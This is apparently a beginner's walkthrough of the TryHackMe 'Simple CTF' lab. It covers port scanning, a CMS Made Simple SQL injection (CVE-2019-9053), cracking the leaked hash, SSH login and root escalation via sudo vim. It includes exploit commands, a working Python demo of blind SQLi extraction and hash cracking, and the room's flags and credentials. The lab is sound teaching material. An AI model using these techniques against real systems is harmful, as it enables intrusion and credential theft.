Hi! It is time to have a thorough look at the Simple CTF room on TryHackMe. This one has a bit of everything, which makes it a great CTF for a beginner.
I am making these walkthroughs to keep myself motivated to learn cyber security and to make sure I retain what I learn in THM's rooms. Join me in learning cyber security. I will try to explain concepts as I go, to set these apart from other walkthroughs.
Room URL: https://tryhackme.com/room/easyctf
Task 1 (Simple CTF)
Deploy the machine and attempt the questions!
When we visit the IP address in a browser we get the following page:
It looks like the default page of a fresh Ubuntu web server. Hmm.. Let's get to the questions!
Questions
How many services are running under port 1000?
To answer this question we can use Nmap to find out more (the SYN scan below needs root, so run it with sudo):
nmap -sS -Pn -T4 -p 0-999 <ip>
Here -sS is a SYN ("stealth") scan: Nmap sends a SYN, looks at the SYN/ACK or RST that comes back and then tears the connection down without completing the three-way handshake, which is quick and leaves less in the target's application logs than a full connect scan. -Pn skips host discovery (the ping probes) and treats the host as up, which matters on boxes that drop ICMP. -T4 selects a faster, more aggressive timing template. -p 0-999 restricts the scan to ports 0 through 999; -p- would scan all 65535 ports. Two ports under 1000 come back open: 21 (FTP) and 80 (HTTP).
Answer: 2
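Counting "open" lines by eye works on a two-port box, but the question is really "how many ports below 1000 are in state open", and filtered or closed entries must not be counted. The script below is an added example written for this walkthrough (not part of the original room or the Nmap project): it parses Nmap's grepable output (-oG), lists the open ports with their service names, and counts those under a limit. The sample output embedded in it is constructed to look like a -oG capture; it is not real scan data from the Simple CTF machine.

```shell
#!/bin/sh
# Added example: answer "how many services run under port 1000?" from nmap -oG output.
# For a real box, produce the input with:  sudo nmap -sS -Pn -T4 -p- -oG scan.gnmap <ip>

# Constructed sample of grepable output (not a capture from the target).
# Each Ports entry has the form  port/state/proto/owner/service/rpcinfo/version/
sample_gnmap() {
  printf '# Nmap 7.94 scan initiated as: nmap -sS -Pn -T4 -p- -oG - 10.10.10.10\n'
  printf 'Host: 10.10.10.10 ()\tStatus: Up\n'
  printf 'Host: 10.10.10.10 ()\tPorts: 21/open/tcp//ftp///, 80/open/tcp//http///, 2222/open/tcp//ssh///, 3306/filtered/tcp//mysql///\tIgnored State: closed (65531)\n'
  printf '# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds\n'
}

# open_services: read -oG text on stdin, print "port proto service" for every OPEN port.
# Fields on a Host line are tab separated; the Ports field is a comma separated list.
open_services() {
  awk -F'\t' '
    /^Host:/ {
      for (i = 1; i <= NF; i++) {
        if (sub(/^Ports: /, "", $i)) {
          n = split($i, entry, ",")
          for (j = 1; j <= n; j++) {
            sub(/^ +/, "", entry[j])          # drop the space after each comma
            split(entry[j], f, "/")
            if (f[2] == "open") print f[1], f[3], f[5]
          }
        }
      }
    }'
}

# count_open_below LIMIT: number of open ports strictly below LIMIT (stdin = -oG text).
count_open_below() {
  open_services | awk -v limit="$1" '$1 + 0 < limit { n++ } END { print n + 0 }'
}

sample_gnmap | open_services
echo "open ports under 1000: $(sample_gnmap | count_open_below 1000)"
```

On the sample the filtered MySQL port is ignored and only 21 and 80 are counted under 1000, while 2222 still shows up in the full listing, which is exactly the distinction the next two questions rely on.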
What is running on the higher port?
Now that we know about ports 21, 80 and 2222 (the last one only shows up when the full port range is scanned), we can get more information on them with the -A flag, which turns on version detection, OS detection, script scanning and traceroute:
nmap -A -Pn -T4 -p21,80,2222 TARGET_IP
There are quite a few interesting facts here: an FTP server that allows anonymous login, a robots.txt with disallowed entries on the web server, and, relevant to this question, SSH listening on the non-standard port 2222.
Answer: ssh
What’s the CVE you’re using against the application?
We need to enumerate a bit more. Let's use gobuster to brute-force files and directories on the web server:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u <ip>
A lot of interesting discoveries here. The one that stands out is the /simple page:
It shows a site running on CMS Made Simple. At the bottom of the page we find the version number:
Let's see if searchsploit knows of any exploits for that version:
searchsploit cms made simple 2.2.8
More info can be found here:
This is the right exploit: the SQL injection for CMS Made Simple versions below 2.2.10 (exploit-db entry 46635), which covers our 2.2.8.
Answer: CVE-2019-9053
To what kind of vulnerability is the application vulnerable?
This is an SQL injection vulnerability, SQLi for short. In this case it is a blind, time-based one: the application never displays the result of the injected query, so the exploit has to infer the data one character at a time from how long the server takes to respond.
Answer: SQLi
What’s the password?
Let's download the script with wget, saving it under a more useful name than the default 46635:
wget https://www.exploit-db.com/download/46635 -O exploit.py
Then we can run the Python script with:
python2 exploit.py -u <url>
Some notes:
- We need to use python2, because the script is written in Python 2 syntax (its print statements, for example).
- If you do not have the requests module installed, run: python2 -m pip install requests
- The same goes for the termcolor module.
After these steps the previous command should run and dump the username, e-mail, salt and password hash. Since we are after the password rather than the hash, we add the -c flag (crack the hash) together with -w (the wordlist to use):
python2 exploit.py -u <url> -c -w /usr/share/wordlists/rockyou.txt
We find the following:
Answer: secret
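The two previous answers (the SQLi vulnerability class, and the -c -w password recovery) are really one procedure: leak the salt and password hash through the injection, then crack the hash offline. Below is that procedure as an added example written for this walkthrough; it is not the exploit-db script and not CMS Made Simple's own code. It assumes a boolean oracle (a row comes back or it does not) in place of the timing oracle the real exploit uses, an in-memory SQLite database with made-up table and column names standing in for the CMS, an md5(salt + password) hash format, and a five-word wordlist in place of rockyou; all of those are constructed for the demo.

```python
"""Added example: blind SQL injection extraction followed by an offline
dictionary attack on the leaked salted-MD5 hash.  Everything below (tables,
salt, password, wordlist) is constructed; it is not the CMS or the exploit."""
import hashlib
import sqlite3
from typing import Optional

SALT = "a1b2c3"        # constructed per-site salt
PASSWORD = "secret"    # constructed; the value the attack should recover
WORDLIST = ["password", "123456", "letmein", "secret", "qwerty"]  # constructed stand-in for rockyou


def build_db() -> sqlite3.Connection:
    """Create the stand-in CMS database: one article, one admin user, one pref."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (news_id INTEGER, title TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE siteprefs (name TEXT, value TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'Welcome')")
    pw_hash = hashlib.md5((SALT + PASSWORD).encode()).hexdigest()  # md5(salt + password)
    conn.execute("INSERT INTO users VALUES ('mitch', ?)", (pw_hash,))
    conn.execute("INSERT INTO siteprefs VALUES ('sitemask', ?)", (SALT,))
    return conn


def vulnerable_news_lookup(conn: sqlite3.Connection, idlist: str) -> list:
    """The bug: a request parameter is pasted straight into the SQL text."""
    query = f"SELECT news_id FROM news WHERE news_id IN ({idlist})"
    return conn.execute(query).fetchall()


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean blind oracle: True exactly when `condition` holds in the database.
    The payload closes the IN (...) list and ANDs our condition onto the query."""
    return bool(vulnerable_news_lookup(conn, f"1) AND ({condition}"))


def extract_length(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> int:
    """Binary-search the length of the value a scalar subquery returns."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(conn: sqlite3.Connection, subquery: str) -> str:
    """Recover the subquery's value one character at a time.  Each character
    costs about seven queries (binary search over printable ASCII 32..126)."""
    out = ""
    for pos in range(1, extract_length(conn, subquery) + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def crack(pw_hash: str, salt: str, wordlist) -> Optional[str]:
    """Offline dictionary attack on md5(salt + candidate): the -c -w step."""
    for word in wordlist:
        if hashlib.md5((salt + word).encode()).hexdigest() == pw_hash:
            return word
    return None


def recover_password(conn: Optional[sqlite3.Connection] = None):
    """Full chain: leak salt and hash through the injection, then crack the hash."""
    if conn is None:
        conn = build_db()
    salt = extract(conn, "SELECT value FROM siteprefs WHERE name = 'sitemask'")
    pw_hash = extract(conn, "SELECT password FROM users WHERE username = 'mitch'")
    return salt, pw_hash, crack(pw_hash, salt, WORDLIST)


if __name__ == "__main__":
    salt, pw_hash, password = recover_password()
    print(f"salt={salt} hash={pw_hash} password={password}")
```

Swapping the oracle is the only difference from the time-based original: there, `condition` is wrapped in a SLEEP and the exploit watches the response time instead of the row count. The cost model is the same, roughly seven requests per leaked character, which is why the script takes a while against the real box.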
Where can you login with the details obtained?
Well, we found SSH on port 2222, so let's try logging in with the recovered credentials 🙂
We are logged in. Note: it is important to pass the -p flag with port 2222. Without it ssh tries the default port 22, which is not open here, and the client just sits there waiting.
Answer: ssh
What’s the user flag?
A simple ls, followed by cat user.txt, gives us the answer:
Answer: G00d j0b, keep up!
Is there any other user in the home directory? What’s its name?
We are in mitch's home directory, so let's go one directory up to /home and list the folders.
Answer: sunbath
What can you leverage to spawn a privileged shell?
Let's list the commands the user is allowed to run through sudo.
mitch may run vim as root, and vim can execute shell commands.
Answer: vim
What’s the root flag?
We can use that to get a root shell: a shell spawned from a vim process that runs as root is itself root. Passing the shell command on the command line does it in one go (typing :!/bin/sh inside the editor works just as well):
sudo vim -c ':!/bin/sh'
This gives us a root shell:
Answer: W3ll d0n3. You made it!
We are done!
Bonus tidbit:
There is a little easter egg on the FTP server. Connect to it with ftp <ip> and log in with the username Anonymous (any password will do). In there you find a text file, which you can print straight to the terminal with get ForMitch.txt - (the trailing - tells the ftp client to write the file to stdout instead of saving it).
This would have given us some extra hints about both the username and the password 🙂
Anyway, thanks for reading! That’s Simple CTF over with!
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: